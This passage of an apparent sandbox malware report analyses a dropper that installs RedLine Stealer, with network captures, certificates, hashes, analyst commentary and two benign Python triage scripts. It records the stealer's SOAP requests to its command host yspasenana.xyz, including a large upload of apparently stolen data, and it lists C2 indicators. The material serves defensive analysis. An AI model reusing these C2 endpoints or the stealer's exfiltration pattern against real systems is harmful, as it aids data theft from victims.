Jul 22, 2021 11:44:12.352585077 CEST | 192.168.2.3 | 8.8.8.8 | 0xa170 | Standard query (0) | yspasenana.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 11:42:58.733603001 CEST | 8.8.8.8 | 192.168.2.3 | 0x574a | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:42:59.391592026 CEST | 8.8.8.8 | 192.168.2.3 | 0x554 | No error (0) | is.gd | | 104.25.234.53 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:42:59.391592026 CEST | 8.8.8.8 | 192.168.2.3 | 0x554 | No error (0) | is.gd | | 172.67.83.132 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:42:59.391592026 CEST | 8.8.8.8 | 192.168.2.3 | 0x554 | No error (0) | is.gd | | 104.25.233.53 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:42:59.755548954 CEST | 8.8.8.8 | 192.168.2.3 | 0x65e1 | No error (0) | bitbucket.org | | 104.192.141.1 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:43:00.481355906 CEST | 8.8.8.8 | 192.168.2.3 | 0xd23c | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:43:00.481355906 CEST | 8.8.8.8 | 192.168.2.3 | 0xd23c | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:43:00.481355906 CEST | 8.8.8.8 | 192.168.2.3 | 0xd23c | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.201.169 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:04.907150984 CEST | 8.8.8.8 | 192.168.2.3 | 0xda5e | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:06.884871960 CEST | 8.8.8.8 | 192.168.2.3 | 0xd22d | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:44:06.953299999 CEST | 8.8.8.8 | 192.168.2.3 | 0x9e5c | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 11:44:11.641484976 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d94 | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)
Jul 22, 2021 11:44:12.412575006 CEST | 8.8.8.8 | 192.168.2.3 | 0xa170 | No error (0) | yspasenana.xyz | | 212.224.105.105 | A (IP address) | IN (0x0001)

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • yspasenana.xyz

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49739 | 212.224.105.105 | 80 | C:\Users\user\AppData\Roaming\325.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:44:05.202037096 CEST | 6920 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: yspasenana.xyz
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Jul 22, 2021 11:44:05.249474049 CEST | 6920 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:44:05.354886055 CEST | 6922 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Jul 2021 09:44:05 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49741 | 212.224.105.105 | 80 | C:\Users\user\AppData\Roaming\325.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 11:44:11.703536034 CEST | 6928 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: yspasenana.xyz
Content-Length: 1125491
Expect: 100-continue
Accept-Encoding: gzip, deflate
Jul 22, 2021 11:44:11.753475904 CEST | 6928 | IN | HTTP/1.1 100 Continue
Jul 22, 2021 11:44:12.285859108 CEST | 8049 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Jul 2021 09:44:12 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip


Session ID: 2
Source: 192.168.2.3:49742
Destination: 212.224.105.105:80
Process: C:\Users\user\AppData\Roaming\325.exe

Jul 22, 2021 11:44:12.465971947 CEST, 8050 kBytes transferred, OUT:
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: yspasenana.xyz
Content-Length: 1125483
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Jul 22, 2021 11:44:12.515531063 CEST, 8050 kBytes transferred, IN:
HTTP/1.1 100 Continue

Jul 22, 2021 11:44:13.002619982 CEST, 9171 kBytes transferred, IN:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Jul 2021 09:44:12 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0

This is a SOAP call (SOAPAction http://tempuri.org/Endpoint/GetUpdates) sent by the dropped 325.exe to yspasenana.xyz over plain HTTP. The request body is 1,125,483 bytes (about 1.1 MB) and is not printed in the report; a body of that size flowing to the C2 is consistent with the upload of harvested data. The `Expect: 100-continue` header is why a `100 Continue` arrives before the `200 OK`. The response body is a single chunk of 0xb3 = 179 bytes of gzip data (1f 8b 08 magic) followed by the terminating zero-length chunk, so the "Data Ascii" line shows compressed bytes and is not readable XML.
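To read the response the report prints as raw bytes, both encodings have to be undone in order: chunked transfer coding first, then gzip. The following is an added example, not code from the report or from the malware; the hex string is copied verbatim from the "Data Raw" line above, and the gzip trailer (CRC32 and uncompressed size) is checked against what zlib actually inflates so a mis-transcribed byte is caught rather than silently producing garbage.

```python
"""De-chunk and gunzip the GetUpdates response captured above.

Added example, not part of the Joe Sandbox report. The body arrives with
Transfer-Encoding: chunked and Content-Encoding: gzip, so the bytes in the
report's "Data Raw" line have to be un-chunked and then inflated before the
SOAP XML is readable. The hex below is copied verbatim from that line.
"""
import binascii
import struct
import zlib
from typing import Dict, Tuple

# Copied from the report: chunk-size line "b3\r\n", 0xb3 = 179 bytes of gzip
# data, CRLF, then the terminating zero-length chunk "0\r\n\r\n".
RESPONSE_BODY_HEX = (
    "62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f "
    "c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 "
    "f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 "
    "8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 "
    "d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 "
    "94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 "
    "d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 "
    "1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 "
    "bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 "
    "8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 "
    "b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 "
    "8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a"
)


def dechunk(body: bytes) -> bytes:
    """Undo HTTP/1.1 chunked transfer coding (RFC 7230 section 4.1).

    Each chunk is "<hex-size>[;extensions]\\r\\n<data>\\r\\n"; a zero-size
    chunk ends the body (trailer fields after it are ignored here). A truncated
    or malformed body raises ValueError instead of returning partial data.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        data = body[pos:pos + size]
        if len(data) != size:
            raise ValueError(f"chunk truncated: expected {size}, got {len(data)} bytes")
        out += data
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def gzip_trailer(stream: bytes) -> Tuple[int, int]:
    """Return (CRC32, ISIZE) from the 8-byte little-endian gzip trailer (RFC 1952)."""
    if len(stream) < 18 or stream[:3] != b"\x1f\x8b\x08":
        raise ValueError("not a gzip stream with a deflate payload")
    return struct.unpack("<II", stream[-8:])


def decode_response(body_hex: str) -> Dict[str, object]:
    """Hex dump -> de-chunked gzip stream -> plaintext, with integrity checks."""
    body = binascii.unhexlify(body_hex.replace(" ", ""))
    stream = dechunk(body)
    crc32, isize = gzip_trailer(stream)
    # wbits = 16 + MAX_WBITS makes zlib expect (and verify) a gzip wrapper.
    plain = zlib.decompress(stream, 16 + zlib.MAX_WBITS)
    if len(plain) != isize or zlib.crc32(plain) != crc32:
        raise ValueError("gzip trailer does not match the inflated data")
    return {"compressed_len": len(stream), "isize": isize,
            "crc32": crc32, "plaintext": plain}


if __name__ == "__main__":
    result = decode_response(RESPONSE_BODY_HEX)
    print(f"{result['compressed_len']} compressed -> {result['isize']} plain bytes")
    print(result["plaintext"].decode("utf-8", errors="replace"))
```

The same routine applies to the 126-byte response shown earlier on the page; only the hex string changes. Reading ISIZE from the trailer before inflating is a cheap sanity check when triaging many captures: a 179-byte chunk that claims to inflate to gigabytes is a decompression-bomb signal, not a SOAP reply.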


HTTPS Packets

Four TLS connections, all opened within three seconds of the sample starting (11:42:57) and before the dropped 325.exe first runs (11:43:03). Every ClientHello carries the same JA3 fingerprint, so one TLS stack produced all four. The Cloudflare-fronted host cannot be identified from the certificate alone (sni.cloudflaressl.com is a shared certificate); the report lists no SNI.

JA3 SSL Client Fingerprint (all four connections): 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest (all four connections): 37f463bf4616ecd445d4a1937da06e19

Jul 22, 2021 11:42:58.915039062 CEST, server 88.99.66.31:443, client 192.168.2.3:49711
Subject: CN=*.iplogger.org
Issuer: CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB
Not Before / Not After: Fri Nov 20 01:00:00 CET 2020 / Sun Nov 21 00:59:59 CET 2021
Chain: CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB, issued by CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US (Fri Nov 02 01:00:00 CET 2018 / Wed Jan 01 00:59:59 CET 2031)
Chain: CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US, issued by CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB (Tue Mar 12 01:00:00 CET 2019 / Mon Jan 01 00:59:59 CET 2029)

Jul 22, 2021 11:42:59.480372906 CEST, server 104.25.234.53:443, client 192.168.2.3:49712
Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US
Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Not Before / Not After: Fri Jun 11 02:00:00 CEST 2021 / Sat Jun 11 01:59:59 CEST 2022
Chain: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US, issued by CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE (Mon Jan 27 13:48:08 CET 2020 / Wed Jan 01 00:59:59 CET 2025)

Jul 22, 2021 11:43:00.024015903 CEST, server 104.192.141.1:443, client 192.168.2.3:49713
Subject: CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization
Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before / Not After: Fri Mar 27 01:00:00 CET 2020 / Mon May 23 14:00:00 CEST 2022
Chain: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US, issued by CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US (Tue Oct 22 14:00:00 CEST 2013 / Sun Oct 22 14:00:00 CEST 2028)

Jul 22, 2021 11:43:00.820909977 CEST, server 52.217.201.169:443, client 192.168.2.3:49715
Subject: CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US
Issuer: CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before / Not After: Mon Jan 11 01:00:00 CET 2021 / Sat Feb 12 00:59:59 CET 2022
Chain: CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US, issued by CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE (Tue Dec 08 13:05:07 CET 2015 / Sat May 10 14:00:00 CEST 2025)

The bitbucket.org and S3 connections complete at 11:43:00 and 325.exe appears in %AppData%\Roaming at 11:43:03, which is consistent with the second stage being fetched from one of those two hosts, although the report does not show the HTTPS payloads.
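The JA3 digest in the table is just the MD5 of the printed fingerprint string, so it can be re-derived offline, and the string itself can be decoded to see what the client offered. The following is an added example, not code from the report; the fingerprint string and digest are copied from the table above, the name tables are a subset of the IANA TLS registries sufficient for this ClientHello, and the GREASE set is the one JA3 removes before hashing (RFC 8701).

```python
"""Decode and re-derive the JA3 client fingerprint from the HTTPS table above.

Added example, not part of the Joe Sandbox report. JA3 is the MD5 of
"TLSVersion,Ciphers,Extensions,SupportedGroups,ECPointFormats", each list
'-'-joined in ClientHello order after GREASE values are dropped.
"""
import hashlib
from typing import Dict, List

# Copied from the report: identical for all four TLS connections in the trace.
JA3_STRING = (
    "771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
    "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0"
)
REPORTED_DIGEST = "37f463bf4616ecd445d4a1937da06e19"

# Subset of the IANA TLS registries, enough for this ClientHello.
TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}
CIPHERS = {
    0xC02C: "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
    0xC02B: "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
    0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0xC024: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384",
    0xC023: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256",
    0xC028: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384",
    0xC027: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256",
    0xC00A: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
    0xC009: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    0xC014: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
    0xC013: "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    0x009D: "TLS_RSA_WITH_AES_256_GCM_SHA384",
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    0x003D: "TLS_RSA_WITH_AES_256_CBC_SHA256",
    0x003C: "TLS_RSA_WITH_AES_128_CBC_SHA256",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
EXTENSIONS = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
              13: "signature_algorithms", 23: "extended_master_secret",
              35: "session_ticket", 43: "supported_versions",
              65281: "renegotiation_info"}
GROUPS = {23: "secp256r1", 24: "secp384r1", 29: "x25519"}

# RFC 8701 GREASE values 0x0A0A, 0x1A1A, ..., 0xFAFA; JA3 drops them so a
# browser's randomised GREASE does not change the hash.
GREASE = {(i << 12) | 0x0A00 | (i << 4) | 0x0A for i in range(16)}


def ja3_digest(ja3: str) -> str:
    """JA3 digest: MD5 of the fingerprint string, lowercase hex."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def ja3_from_fields(version: int, ciphers: List[int], extensions: List[int],
                    groups: List[int], formats: List[int]) -> str:
    """Build the JA3 string from raw ClientHello values, dropping GREASE."""
    def join(values: List[int]) -> str:
        return "-".join(str(v) for v in values if v not in GREASE)
    return ",".join([str(version), join(ciphers), join(extensions),
                     join(groups), join(formats)])


def parse_ja3(ja3: str) -> Dict[str, object]:
    """Split a JA3 string into its five fields and name what the client offered."""
    fields = ja3.split(",")
    if len(fields) != 5:
        raise ValueError("a JA3 string has exactly five comma-separated fields")

    def ints(field: str) -> List[int]:
        return [int(v) for v in field.split("-")] if field else []

    version = int(fields[0])
    ciphers, exts, groups, fmts = (ints(f) for f in fields[1:])
    return {
        "raw": (version, ciphers, exts, groups, fmts),
        "version": TLS_VERSIONS.get(version, f"unknown({version})"),
        "ciphers": [CIPHERS.get(c, f"unknown(0x{c:04x})") for c in ciphers],
        "extensions": [EXTENSIONS.get(e, f"unknown({e})") for e in exts],
        "groups": [GROUPS.get(g, f"unknown({g})") for g in groups],
        "point_formats": fmts,
        # TLS 1.3 clients keep 771 in the legacy version field and advertise
        # 1.3 through supported_versions (43); without it, no TLS 1.3 on offer.
        "offers_tls13": 43 in exts,
        # Static-RSA key exchange (no ECDHE) gives no forward secrecy.
        "no_forward_secrecy": [CIPHERS[c] for c in ciphers
                               if c in CIPHERS and "_ECDHE_" not in CIPHERS[c]],
    }


if __name__ == "__main__":
    info = parse_ja3(JA3_STRING)
    print(info["version"], "| digest matches report:",
          ja3_digest(JA3_STRING) == REPORTED_DIGEST)
    for name in info["ciphers"]:
        print("  cipher   ", name)
    for name in info["extensions"]:
        print("  extension", name)
```

Re-hashing the printed string is a useful check whenever a report is the only evidence: if the digest does not match, the displayed string was altered or truncated and should not be used as a hunting indicator. Here the decoded hello is a TLS 1.2-only client with a fixed 19-cipher list and no supported_versions extension, the kind of stable, non-browser fingerprint that is worth matching on the network alongside the destination hosts.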

                                                                                                                                                                            Behavior

                                                                                                                                                                            System Behavior

General

Start time: 11:42:57
Start date: 22/07/2021
Path: C:\Users\user\Desktop\kS2dqbsDwD.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
Imagebase: 0x140000000
File size: 598944 bytes
MD5 hash: 888AB99280A081717EC5C5749266D1BD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 11:43:03
Start date: 22/07/2021
Path: C:\Users\user\AppData\Roaming\325.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\325.exe 325
Imagebase: 0x3b0000
File size: 979968 bytes
MD5 hash: 523AC177BFB4FB64A20B60FC0CE3E0E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 33%, ReversingLabs
Reputation: low

General

Start time: 11:43:44
Start date: 22/07/2021
Path: C:\Users\user\AppData\Roaming\325.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0x6b0000
File size: 979968 bytes
MD5 hash: 523AC177BFB4FB64A20B60FC0CE3E0E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

The submitted sample is a native 64-bit executable (imagebase 0x140000000, not a Wow64 process) that drops the 32-bit .NET 325.exe into %AppData%\Roaming. 325.exe runs twice: at 11:43:03 with the argument `325`, and again at 11:43:44 with no arguments (`{path}` is the report's placeholder for the executable's own path). In the first instance the AntiVM and RedLine rules match heap-like regions (0x295C000 and 0x3A20000, protection 0x04 = PAGE_READWRITE in the dump name). In the second instance the RedLine rule matches at 0x402000, which lies outside that process's own image at 0x6b0000 and is consistent with a second PE mapped at the default 0x400000 base with protection 0x40 (PAGE_EXECUTE_READWRITE): the unpacked stealer, matching the "changes PE section rights" signature above, rather than 325.exe's own code.
